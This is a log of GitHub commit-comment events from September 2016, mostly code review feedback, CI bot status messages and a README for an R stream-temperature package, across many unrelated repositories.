{"id":"4571988657","type":"CommitCommentEvent","actor":{"login":"carilevay"},"repo":{"name":"richfish/sfdata26_work"},"payload":{"comment":{"id":19048047,"position":null,"line":null,"path":null,"commit_id":"dc9df628f7beeedc6cd2e6566b98ccf9aa805bfa","created_at":"2016-09-16T03:21:49Z","updated_at":"2016-09-16T03:21:49Z","body":"Businesses\r\n\r\n- # 1 - All I can say is, you took this merge to another level.\r\n- # 4 - Nice job on the heatmap (you're one of two students who got this)\r\n\r\nMorbid\r\n\r\n- # 7 - Nice job digging deeper into the data :)\r\n\r\nLess Morbid\r\n\r\n- # 3/4 - Again, awesome job digging deeper and not just taking the question at face value.\r\n\r\nFollow up: Were there any specific questions you had that I can help with besides the Instagram extra credit, which I know you and Sinan had a chance to chat about?"}},"created_at":"2016-09-16T03:21:49Z"}
{"id":"4571991970","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19048055,"position":null,"line":null,"path":null,"commit_id":"936780f017e63f2933d14138f951e91c06c6752f","created_at":"2016-09-16T03:23:20Z","updated_at":"2016-09-16T03:23:20Z","body":"Related to: backdrop/backdrop-issues#2063 "}},"created_at":"2016-09-16T03:23:20Z"}
{"id":"4572000816","type":"CommitCommentEvent","actor":{"login":"sahrens"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19048083,"position":7,"line":104,"path":"Libraries/Interaction/InteractionManager.js","commit_id":"3b5e4cc59331b49d2ab8cf2fed74dabd2251fe9c","created_at":"2016-09-16T03:27:22Z","updated_at":"2016-09-16T03:27:22Z","body":"Ah jeeze, good catch..."}},"created_at":"2016-09-16T03:27:22Z"}
{"id":"4572005168","type":"CommitCommentEvent","actor":{"login":"slavapestov"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19048094,"position":5,"line":1266,"path":"lib/Serialization/DeserializeSIL.cpp","commit_id":"670ba8a3fc3c006fb438fee065285e046aa9bbef","created_at":"2016-09-16T03:29:25Z","updated_at":"2016-09-16T03:29:25Z","body":"This change introduces a compiler warning:\r\n\r\n```/Users/slava/new/swift/lib/Serialization/DeserializeSIL.cpp:763:11: warning: enumeration values 'DebugValueInst' and 'DebugValueAddrInst' not handled in switch [-Wswitch]\r\n  switch ((ValueKind)OpCode) {\r\n          ^\r\n1 warning generated.```\r\n\r\nCan you add some cases that just call llvm_unreachable or assert(false) or something?"}},"created_at":"2016-09-16T03:29:25Z"}
{"id":"4572015582","type":"CommitCommentEvent","actor":{"login":"kyatohon"},"repo":{"name":"kyatohon/BaconWrappedHotdogs"},"payload":{"comment":{"id":19048112,"position":null,"line":null,"path":null,"commit_id":"20f4175e7877d069aa4abc7947b64d8ece7ce351","created_at":"2016-09-16T03:34:27Z","updated_at":"2016-09-16T03:34:27Z","body":"Meant to title this 'Updated repo description'."}},"created_at":"2016-09-16T03:34:27Z"}
{"id":"4572017841","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"rtaykowski/homework-city"},"payload":{"comment":{"id":19048120,"position":20,"line":20,"path":"drop-down/js/index.js","commit_id":"8395c1a5f9aae727f12df4c543a565e31e2df8d7","created_at":"2016-09-16T03:35:36Z","updated_at":"2016-09-16T03:35:36Z","body":"Excellent job using `$(this)`! This is a perfect time to apply this concept. It is great to see you refactoring from your previous code."}},"created_at":"2016-09-16T03:35:36Z"}
{"id":"4572020402","type":"CommitCommentEvent","actor":{"login":"timelyportfolio"},"repo":{"name":"abresler/fundManageR"},"payload":{"comment":{"id":19048125,"position":13,"line":25,"path":"DESCRIPTION","commit_id":"3ec3765ceeccfc58de2bae92ac76edebf0a33e48","created_at":"2016-09-16T03:36:48Z","updated_at":"2016-09-16T03:36:48Z","body":"curlconverter?"}},"created_at":"2016-09-16T03:36:48Z"}
{"id":"4572023227","type":"CommitCommentEvent","actor":{"login":"ioncann0ns"},"repo":{"name":"ioncann0ns/ad2dispatch"},"payload":{"comment":{"id":19048131,"position":null,"line":null,"path":null,"commit_id":"8863b738c012fd0e532df082546bf7f472aa029c","created_at":"2016-09-16T03:38:11Z","updated_at":"2016-09-16T03:38:11Z","body":"Serving files locally helps prevent style errors from TLS errors on other domains.\r\nBeing a DoD-heavy resource, the likelihood of TLS errors due to https-MitM is high."}},"created_at":"2016-09-16T03:38:11Z"}
{"id":"4572023450","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"rtaykowski/homework-city"},"payload":{"comment":{"id":19048132,"position":9,"line":9,"path":"drop-down/js/index.js","commit_id":"8395c1a5f9aae727f12df4c543a565e31e2df8d7","created_at":"2016-09-16T03:38:18Z","updated_at":"2016-09-16T03:38:18Z","body":"Great job going for the advanced concept and applying the `forEach` loop."}},"created_at":"2016-09-16T03:38:18Z"}
{"id":"4572024923","type":"CommitCommentEvent","actor":{"login":"ioncann0ns"},"repo":{"name":"ioncann0ns/ad2dispatch"},"payload":{"comment":{"id":19048138,"position":null,"line":null,"path":null,"commit_id":"10a1413a6e9a62cac16291c60f8c30884c287522","created_at":"2016-09-16T03:39:01Z","updated_at":"2016-09-16T03:39:01Z","body":"Font is a bit easier to read."}},"created_at":"2016-09-16T03:39:01Z"}
{"id":"4572026762","type":"CommitCommentEvent","actor":{"login":"nitingupta910"},"repo":{"name":"evancz/elm-architecture-tutorial"},"payload":{"comment":{"id":19048146,"position":null,"line":null,"path":null,"commit_id":"82243d2d8a4269547ee37276fd98c851a14d7d38","created_at":"2016-09-16T03:39:56Z","updated_at":"2016-09-16T03:39:56Z","body":"Would it be possible to bring back at least the IndexedCounter example. I think it's quite common to have a list of things (files under dir, out/in edges from/to nodes in graph etc.). I personally use this pattern everyday and find it quite useful."}},"created_at":"2016-09-16T03:39:56Z"}
{"id":"4572030619","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19048156,"position":null,"line":null,"path":null,"commit_id":"b990c306194ef024f43b24da7c720144100878e2","created_at":"2016-09-16T03:41:44Z","updated_at":"2016-09-16T03:41:44Z","body":"opkg problems updating Python or just reverting because ATV did?\r\n"}},"created_at":"2016-09-16T03:41:44Z"}
{"id":"4572032980","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19048165,"position":null,"line":null,"path":null,"commit_id":"65167f9f15783f508be28c9463d23d80401adb84","created_at":"2016-09-16T03:42:52Z","updated_at":"2016-09-16T03:42:52Z","body":"Related to: backdrop/backdrop-issues#2020 "}},"created_at":"2016-09-16T03:42:52Z"}
{"id":"4572037573","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19048179,"position":9,"line":9,"path":"spec/features/user_can_check_out_spec.rb","commit_id":"48749cf8f2df9bfb9766c24b563b625c010c3dfb","created_at":"2016-09-16T03:45:04Z","updated_at":"2016-09-16T03:45:04Z","body":"Since we are clicking on \"add cart\" in the following line, we can get rid of this."}},"created_at":"2016-09-16T03:45:04Z"}
{"id":"4572037724","type":"CommitCommentEvent","actor":{"login":"ajkr"},"repo":{"name":"facebook/rocksdb"},"payload":{"comment":{"id":19048180,"position":44,"line":855,"path":"db/db_impl.cc","commit_id":"9e4aa798c3d47c6be64324bd9d38f0813c8ead7b","created_at":"2016-09-16T03:45:10Z","updated_at":"2016-09-16T03:45:10Z","body":"oops, i totally missed that this doesn't handle the case where db_options_.wal_dir == dbname_"}},"created_at":"2016-09-16T03:45:10Z"}
{"id":"4572038690","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19048182,"position":3,"line":3,"path":"spec/features/user_can_check_out_spec.rb","commit_id":"48749cf8f2df9bfb9766c24b563b625c010c3dfb","created_at":"2016-09-16T03:45:37Z","updated_at":"2016-09-16T03:45:37Z","body":"Damn @tgisg you picked another beefy one to tackle. That's what I like about you; you never shy away from a challenge."}},"created_at":"2016-09-16T03:45:37Z"}
{"id":"4572040173","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19048187,"position":13,"line":13,"path":"spec/features/user_can_check_out_spec.rb","commit_id":"48749cf8f2df9bfb9766c24b563b625c010c3dfb","created_at":"2016-09-16T03:46:22Z","updated_at":"2016-09-16T03:46:22Z","body":"Any reason why we aren't doing ```visit cart_path``` here?"}},"created_at":"2016-09-16T03:46:22Z"}
{"id":"4572041588","type":"CommitCommentEvent","actor":{"login":"Gdimitron"},"repo":{"name":"Gdimitron/PiCollectionDeviantArtPlugin"},"payload":{"comment":{"id":19048191,"position":54,"line":213,"path":"src/deviant_html.cpp","commit_id":"f57dd6117c4b3f79f4234ebebcdd3ac585ee1db2","created_at":"2016-09-16T03:47:06Z","updated_at":"2016-09-16T03:47:06Z","body":"And where in this function you see global variables? Do you know anything about C/C++? Please don't disgrace yourself."}},"created_at":"2016-09-16T03:47:06Z"}
{"id":"4572042466","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19048192,"position":23,"line":23,"path":"spec/features/user_can_check_out_spec.rb","commit_id":"48749cf8f2df9bfb9766c24b563b625c010c3dfb","created_at":"2016-09-16T03:47:34Z","updated_at":"2016-09-16T03:47:34Z","body":"Same as above, any reason to actually click on the link vs ```visit cart_path```?"}},"created_at":"2016-09-16T03:47:34Z"}
{"id":"4572043092","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19048193,"position":null,"line":null,"path":null,"commit_id":"3901b072d07804c76f2947da1c08b20439b79ac1","created_at":"2016-09-16T03:47:53Z","updated_at":"2016-09-16T03:47:53Z","body":"FixTransitionRules (Myoldmopar) - Win64-Windows-7-VisualStudio-12: OK (2336 of 2336 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3901b072d07804c76f2947da1c08b20439b79ac1-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3901b072d07804c76f2947da1c08b20439b79ac1-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-16T03:47:53Z"}
{"id":"4572043403","type":"CommitCommentEvent","actor":{"login":"junjieChen0608"},"repo":{"name":"junjieChen0608/CSE421"},"payload":{"comment":{"id":19048194,"position":null,"line":null,"path":null,"commit_id":"873b66d834b7d1fd0dc3566e158d6c7610629937","created_at":"2016-09-16T03:48:01Z","updated_at":"2016-09-16T03:48:01Z","body":"Please comment where need to be changed"}},"created_at":"2016-09-16T03:48:01Z"}
{"id":"4572045022","type":"CommitCommentEvent","actor":{"login":"tsangyp"},"repo":{"name":"tsangyp/StreamThermal"},"payload":{"comment":{"id":19048196,"position":null,"line":null,"path":null,"commit_id":"f0269be134ee6d1b3d832c49a5d6486b01893223","created_at":"2016-09-16T03:48:47Z","updated_at":"2016-09-16T03:48:47Z","body":"# StreamThermal\r\n\r\nFor the full documentation of the package and an application on association between stream temperature and fish, please read:\r\n[StreamThermal: A Software Package for Calculating Thermal Metrics from Stream Temperature Data](http://www.tandfonline.com/doi/full/10.1080/03632415.2016.1210517)\r\n\r\nStreamThermal version synthesizes daily average, maximum, and/or minimum stream temperature records into 267 possible stream thermal metrics for a time period of interest, including months or seasons, which may be user-defined).  Metrics are listed in Table 1 and are grouped into five different categories describing different aspects of stream thermal regimes. To identify these categories as well as specific metrics in each category, we incorporated information from recent publications on stream thermal regimes (e.g., Chu, 2010, Olden and Naiman 2010, Arismendi 2013) and based on expert opinion.  Magnitude metrics characterize monthly and seasonal average, maximum, and minimum temperatures from daily temperatures, as well as 3, 7, 14, 21, and 30-day moving averages for mean and maximum daily temperatures.  Variability metrics summarize monthly and seasonal range in daily mean temperatures, as well as monthly coefficient of variation of daily mean, maximum, and minimum, temperatures.  Variability metrics also summarize moving averages for daily ranges and moving variability in extreme temperatures, which is calculated from differences in average high and low temperatures over various time periods.  Frequency metrics indicate number of days in months or seasons that key events exceed user-defined temperatures of interest.  Timing metrics indicate Julian days of key events including mean, maximum, and minimum temperatures; they also indicate Julian days of mean, maximum, and minimum values over moving windows.  The final category, rate of change includes just two metrics.  For months or seasons, rate of change indicates the difference in magnitude of maximum and minimum temperatures divided by the number of days between these events (following Chu et al. 2010). In all categories, the months that are included in the calculation of seasonal metrics can be defined by users.\r\nTo use StreamThermal to calculate stream thermal metrics, the date, maximum daily temperature, minimum daily temperature, and mean daily temperature must be assembled for at least one month of data from a single year.  Records must be assembled in the order listed above, formatted as four columns of data frame in R  If multiple years of data are available, metrics will be calculated based on averages across years.  Missing records are allowed within the dataset, and StreamThermal will calculate metrics for a time period of interest provided data are available for two-thirds of that time and provided that there is not a gap of records of more than 5 days in length. Metrics are calculated in groupings (Table 1), and R provides output in a data frame format.\r\nThe package is attached with this paper and can be downloaded from github, repository “StreamThermal” in account: tsangyp. \r\n\r\n###To install this package in R\r\n\r\ninstall.packages(\"devtools\")\r\n\r\nlibrary(devtools)\r\n\r\ninstall_github('StreamThermal','tsangyp')\r\n\r\nlibrary(StreamThermal)\r\n\r\n###List of functions\r\nT_magnitude\r\n  \r\nT_variability\r\n  \r\nT_frequency\r\n  \r\nT_timing\r\n  \r\nT_rateofchange\r\n"}},"created_at":"2016-09-16T03:48:47Z"}
{"id":"4572046378","type":"CommitCommentEvent","actor":{"login":"tsangyp"},"repo":{"name":"tsangyp/StreamThermal"},"payload":{"comment":{"id":19048197,"position":null,"line":null,"path":null,"commit_id":"f0269be134ee6d1b3d832c49a5d6486b01893223","created_at":"2016-09-16T03:49:24Z","updated_at":"2016-09-16T03:49:24Z","body":"link to Fisheries paper and add a simple document for installation"}},"created_at":"2016-09-16T03:49:24Z"}
{"id":"4572047911","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19048200,"position":32,"line":32,"path":"spec/features/user_can_check_out_spec.rb","commit_id":"48749cf8f2df9bfb9766c24b563b625c010c3dfb","created_at":"2016-09-16T03:50:06Z","updated_at":"2016-09-16T03:50:06Z","body":"I recommend replicating the ```order/show.html.erb``` code for this. I think we should try to turn that into a partial because there are two places now where we need to see an individual order."}},"created_at":"2016-09-16T03:50:06Z"}
{"id":"4572047932","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19048201,"position":null,"line":null,"path":null,"commit_id":"a4ad9e97cbef926a02f20ff716cb13af4c03b257","created_at":"2016-09-16T03:50:07Z","updated_at":"2016-09-16T03:50:07Z","body":"Related to: backdrop/backdrop-issues#2020 "}},"created_at":"2016-09-16T03:50:07Z"}
{"id":"4572049194","type":"CommitCommentEvent","actor":{"login":"absprague"},"repo":{"name":"absprague/21_card_trick"},"payload":{"comment":{"id":19048203,"position":null,"line":null,"path":null,"commit_id":"bcb209dcc590a3ad3a1c08211727209d6fe4c848","created_at":"2016-09-16T03:50:43Z","updated_at":"2016-09-16T03:50:43Z","body":"Hopefully you can see a little bit where I'm going with this. This has the GUI started, mostly since the only thing the board class would be good for is calling the addToColumn method and maybe overwriting toString() in command line, so I wouldn't have much to do until we were ready for GUI."}},"created_at":"2016-09-16T03:50:43Z"}
{"id":"4572050348","type":"CommitCommentEvent","actor":{"login":"codeartress0"},"repo":{"name":"codeartress0/codeartress"},"payload":{"comment":{"id":19048204,"position":null,"line":null,"path":null,"commit_id":"db7776b6ea9db1f1fa7ee26d6bf1f1873aca28e2","created_at":"2016-09-16T03:51:17Z","updated_at":"2016-09-16T03:51:17Z","body":"1"}},"created_at":"2016-09-16T03:51:17Z"}
{"id":"4572050443","type":"CommitCommentEvent","actor":{"login":"dgmis"},"repo":{"name":"dgmis/testgit"},"payload":{"comment":{"id":19048205,"position":null,"line":null,"path":null,"commit_id":"d0237c93155bf12e26f627f336b942bbda1125b0","created_at":"2016-09-16T03:51:19Z","updated_at":"2016-09-16T03:51:19Z","body":"ddddddd"}},"created_at":"2016-09-16T03:51:19Z"}
{"id":"4572056178","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19048212,"position":5,"line":7,"path":"config/routes.rb","commit_id":"48749cf8f2df9bfb9766c24b563b625c010c3dfb","created_at":"2016-09-16T03:53:55Z","updated_at":"2016-09-16T03:53:55Z","body":"I get excited when we add new routes. "}},"created_at":"2016-09-16T03:53:55Z"}
{"id":"4572060218","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19048221,"position":null,"line":null,"path":null,"commit_id":"ec3d29e66716069b104226a170b13a759e7f5328","created_at":"2016-09-16T03:55:48Z","updated_at":"2016-09-16T03:55:48Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-16T03:55:48Z"}
{"id":"4572060570","type":"CommitCommentEvent","actor":{"login":"usakhelo"},"repo":{"name":"FreeCAD/FreeCAD"},"payload":{"comment":{"id":19048222,"position":19,"line":502,"path":"src/Mod/PartDesign/Gui/Utils.cpp","commit_id":"b68bce11de7ebf3c3b4d8d2abae2bb1617d2baf3","created_at":"2016-09-16T03:55:57Z","updated_at":"2016-09-16T03:55:57Z","body":"Thanks, I didn't think about that. Fixed in next [commit](https://github.com/usakhelo/FreeCAD/commit/bf86567d7828065ed5d8b4dd3d3b20b1d7621c42) (presumably)"}},"created_at":"2016-09-16T03:55:57Z"}
{"id":"4572061289","type":"CommitCommentEvent","actor":{"login":"Artoria2e5"},"repo":{"name":"googollee/eviltransform"},"payload":{"comment":{"id":19048223,"position":null,"line":null,"path":null,"commit_id":"6091f17009a2abb19ab959bafaac71e09763752d","created_at":"2016-09-16T03:56:16Z","updated_at":"2016-09-16T03:56:16Z","body":"Meh, 我的朋友啊，你肯定是暴力 merge 了……"}},"created_at":"2016-09-16T03:56:16Z"}
{"id":"4572062466","type":"CommitCommentEvent","actor":{"login":"gianca970226"},"repo":{"name":"DARKATOS/ProyectoSoftware3"},"payload":{"comment":{"id":19048225,"position":null,"line":null,"path":null,"commit_id":"9777505d82c3280dcc88ce88b1d8bf20fdc83a90","created_at":"2016-09-16T03:56:49Z","updated_at":"2016-09-16T03:56:49Z","body":"asdasd"}},"created_at":"2016-09-16T03:56:49Z"}
{"id":"4572064033","type":"CommitCommentEvent","actor":{"login":"sheniff"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19048228,"position":null,"line":null,"path":null,"commit_id":"7c54b751bf25f3f07250bc9769917d58b1d30934","created_at":"2016-09-16T03:57:32Z","updated_at":"2016-09-16T03:57:32Z","body":"@christopherthielen Thanks for this! when are you planning to release a new version with this changes? Really looking forward to it to **finally** stabilize my project into `angular 2.0.0` :D Thanks again!"}},"created_at":"2016-09-16T03:57:32Z"}
{"id":"4572064705","type":"CommitCommentEvent","actor":{"login":"cccRaim"},"repo":{"name":"medz/thinksns"},"payload":{"comment":{"id":19048230,"position":null,"line":null,"path":null,"commit_id":"4ebc3f823e63f7899148c1326f2a70b68fcdd832","created_at":"2016-09-16T03:57:54Z","updated_at":"2016-09-16T03:57:54Z","body":"好像更新了很多东西"}},"created_at":"2016-09-16T03:57:54Z"}
{"id":"4572066212","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"rtaykowski/homework-city"},"payload":{"comment":{"id":19048235,"position":null,"line":null,"path":null,"commit_id":"8395c1a5f9aae727f12df4c543a565e31e2df8d7","created_at":"2016-09-16T03:58:40Z","updated_at":"2016-09-16T03:58:40Z","body":"Everything looks excellent! It would be cool to see you go for the bonuses and perhaps attempt the `switch` statement instead of a `if/else` block."}},"created_at":"2016-09-16T03:58:40Z"}
{"id":"4572067446","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19048238,"position":null,"line":null,"path":null,"commit_id":"34f2416f83c3981c14be6c1d0c9e72f6fdc6f495","created_at":"2016-09-16T03:59:18Z","updated_at":"2016-09-16T03:59:18Z","body":"The following doc(s) have been deployed to the [1881kalabo](https://1881kalabo-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/kalabox](https://1881kalabo-static-docs.pantheonsite.io/docs/kalabox)\n- [docs/local-development](https://1881kalabo-static-docs.pantheonsite.io/docs/local-development)\n- [source/docs/assets/images/kalabox-action-pull.png](https://github.com/pantheon-systems/documentation/commit/02db6d29239d57e06a98ead195abb335a5fb369a/source/docs/assets/images/kalabox-action-pull.png)\n- [source/docs/assets/images/kalabox-action-push.png](https://github.com/pantheon-systems/documentation/commit/02db6d29239d57e06a98ead195abb335a5fb369a/source/docs/assets/images/kalabox-action-push.png)\n- [source/docs/assets/images/kalabox-add-site.png](https://github.com/pantheon-systems/documentation/commit/02db6d29239d57e06a98ead195abb335a5fb369a/source/docs/assets/images/kalabox-add-site.png)\n"}},"created_at":"2016-09-16T03:59:18Z"}
{"id":"4572071020","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19048245,"position":18,"line":21,"path":"spec/models/order_spec.rb","commit_id":"48749cf8f2df9bfb9766c24b563b625c010c3dfb","created_at":"2016-09-16T04:00:50Z","updated_at":"2016-09-16T04:00:50Z","body":"I'm confused about how we are instantiating ```order``` here. My understanding is that ```Order``` is an activerecord object, so to make a new one we'd have to call ```.new``` and then ```.save``` or ```create```. In this context, the way I'm reading the code I'm assuming that ```Order.new(cart_contents)``` is meant to instantiate a PORO (my fav kind of RO). I think we will want a PORO to handle the cart -> order translation. I'm pretty sure calling this object an order will create an error or at least be confusing."}},"created_at":"2016-09-16T04:00:50Z"}
{"id":"4572072962","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19048248,"position":null,"line":null,"path":null,"commit_id":"48749cf8f2df9bfb9766c24b563b625c010c3dfb","created_at":"2016-09-16T04:01:44Z","updated_at":"2016-09-16T04:01:44Z","body":"@tgisg Really nice test. Thanks for persevering after our battle against card 24 this afternoon. You are a better person than me in that regard. Looking forward to picking this up with you tomorrow."}},"created_at":"2016-09-16T04:01:44Z"}
{"id":"4572074874","type":"CommitCommentEvent","actor":{"login":"lau"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":19048251,"position":218,"line":758,"path":"lib/elixir/lib/calendar.ex","commit_id":"e50735ff2a7c16cc7705d8fa59af906e986c19f7","created_at":"2016-09-16T04:02:39Z","updated_at":"2016-09-16T04:02:39Z","body":"> I added DateTime.from_naive/2 that expects the datetime and the timezone. The timezone must be \"Etc/UTC\" but we have the option to make it general later on once we support tzdata. I have also removed NaiveDateTime.to_unix/1.\r\n\r\nThat sounds great!\r\n\r\nAs for the rest I unfortunately haven't had time (hehe) today, but I'll respond Friday."}},"created_at":"2016-09-16T04:02:39Z"}
{"id":"4572076409","type":"CommitCommentEvent","actor":{"login":"christopherthielen"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19048253,"position":null,"line":null,"path":null,"commit_id":"7c54b751bf25f3f07250bc9769917d58b1d30934","created_at":"2016-09-16T04:03:27Z","updated_at":"2016-09-16T04:03:27Z","body":"Hopefully this weekend. I also have some work to do on NgModule support\n(look for breaking changes from beta.2) to support AoT compilation.\nOn Thu, Sep 15, 2016 at 10:57 PM Sergio Almécija <notifications@github.com>\nwrote:\n\n> @christopherthielen <https://github.com/christopherthielen> Thanks for\n> this! when are you planning to release a new version with this changes?\n> Really looking forward to it to *finally* stabilize my project into angular\n> 2.0.0 :D Thanks again!\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/angular-ui/ui-router/commit/7c54b751bf25f3f07250bc9769917d58b1d30934#commitcomment-19048228>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AB9VZjZjJd3ZBFD4Lr2s1qoKe_lsJYaqks5qqhO0gaJpZM4J-ku0>\n> .\n>\n"}},"created_at":"2016-09-16T04:03:27Z"}
{"id":"4572077370","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19048256,"position":5,"line":5,"path":"app/views/items/show.html.erb","commit_id":"10ee5b038c9bdb6c16239e556c0ecbcb0d388ea9","created_at":"2016-09-16T04:03:58Z","updated_at":"2016-09-16T04:03:58Z","body":"love this."}},"created_at":"2016-09-16T04:03:58Z"}
{"id":"4572078889","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19048261,"position":18,"line":4,"path":"spec/features/retired_item_cannot_be_added_to_cart_spec.rb","commit_id":"10ee5b038c9bdb6c16239e556c0ecbcb0d388ea9","created_at":"2016-09-16T04:04:41Z","updated_at":"2016-09-16T04:04:41Z","body":"This looks good."}},"created_at":"2016-09-16T04:04:41Z"}
{"id":"4572079032","type":"CommitCommentEvent","actor":{"login":"abdelrahman-Mohamed"},"repo":{"name":"abdelrahman-Mohamed/test"},"payload":{"comment":{"id":19048262,"position":31,"line":30,"path":"Untitled Document","commit_id":"d9f73c5e2f83993ea3d2fff1e20c872161ce3f15","created_at":"2016-09-16T04:04:45Z","updated_at":"2016-09-16T04:04:45Z","body":"لية السطر دة يا معلم "}},"created_at":"2016-09-16T04:04:45Z"}
{"id":"4572079138","type":"CommitCommentEvent","actor":{"login":"ikeda-naomi"},"repo":{"name":"ikeda-naomi/test"},"payload":{"comment":{"id":19048263,"position":null,"line":null,"path":null,"commit_id":"82ab3608c6340248cf33b571c8c9e3bb3517171a","created_at":"2016-09-16T04:04:48Z","updated_at":"2016-09-16T04:04:48Z","body":"create"}},"created_at":"2016-09-16T04:04:48Z"}
{"id":"4572084572","type":"CommitCommentEvent","actor":{"login":"liao1995"},"repo":{"name":"liao1995/LPython"},"payload":{"comment":{"id":19048268,"position":null,"line":null,"path":null,"commit_id":"03ecc3e0dcb45418c4547e65cfb3ea0cb8782f09","created_at":"2016-09-16T04:06:44Z","updated_at":"2016-09-16T04:06:44Z","body":"@MingGuangShao 试试这个，很有意思。直接调用有道API翻译文本\r\n[代码](https://github.com/liao1995/LPython/blob/master/translate_it.py)"}},"created_at":"2016-09-16T04:06:44Z"}
{"id":"4572085350","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19048270,"position":null,"line":null,"path":null,"commit_id":"f28304275f2fe7005c191801ee718a1602a934b3","created_at":"2016-09-16T04:07:07Z","updated_at":"2016-09-16T04:07:07Z","body":"@kctrlv @susiirwin nice work with this migration / retired functionality."}},"created_at":"2016-09-16T04:07:07Z"}
{"id":"4572087331","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19048273,"position":null,"line":null,"path":null,"commit_id":"2a30cb97d45dbeb7a4009dcd92480b6b7b34aa5d","created_at":"2016-09-16T04:08:04Z","updated_at":"2016-09-16T04:08:04Z","body":"So it's time to focus on puppyinstaller. I want to bring frugalinstaller and grub4dosconfig to  rootfs-skeleton.\r\n\r\nI personally find that the universal and simple method for a frugal install is use a wee bootloader (supports ext2-3-4, ntfs, fat), with an embbeded menu to only find and boot grldr. I use it in my hds and usbs.. it always works."}},"created_at":"2016-09-16T04:08:04Z"}
{"id":"4572088801","type":"CommitCommentEvent","actor":{"login":"PlanetEfficacy"},"repo":{"name":"PlanetEfficacy/little_shop"},"payload":{"comment":{"id":19048275,"position":null,"line":null,"path":null,"commit_id":"6c69713db6b9f455e347a33514d4325ff86a58fe","created_at":"2016-09-16T04:08:44Z","updated_at":"2016-09-16T04:08:44Z","body":"@kctrlv @susiirwin nice work on getting into some of this styling. Thank you!"}},"created_at":"2016-09-16T04:08:44Z"}
{"id":"4572095948","type":"CommitCommentEvent","actor":{"login":"davewasmer"},"repo":{"name":"denali-js/denali"},"payload":{"comment":{"id":19048295,"position":null,"line":null,"path":null,"commit_id":"ffd1657dbb789ed663a6679fb1067a79bb19e4d6","created_at":"2016-09-16T04:11:58Z","updated_at":"2016-09-16T04:11:58Z","body":"Seems like the default value here should be `null`, otherwise [this line](https://github.com/denali-js/denali/blob/master/lib/runtime/action.js#L178) only works because an empty string is falsey, which is the kind of type coercion I'd like to avoid.\r\n\r\nAlso, the default value isn't `'application'`, strictly speaking. If this serializer property isn't provided, and the response value is not an Error or recognizable Model, then it will fall back to the application serializer. Perhaps we can document the default value as `null`, and reword these inline docs to suggest that this property is really for **forcing** the serializer for a given action. In the normal course of things, I'd expect this to be used sparingly."}},"created_at":"2016-09-16T04:11:58Z"}
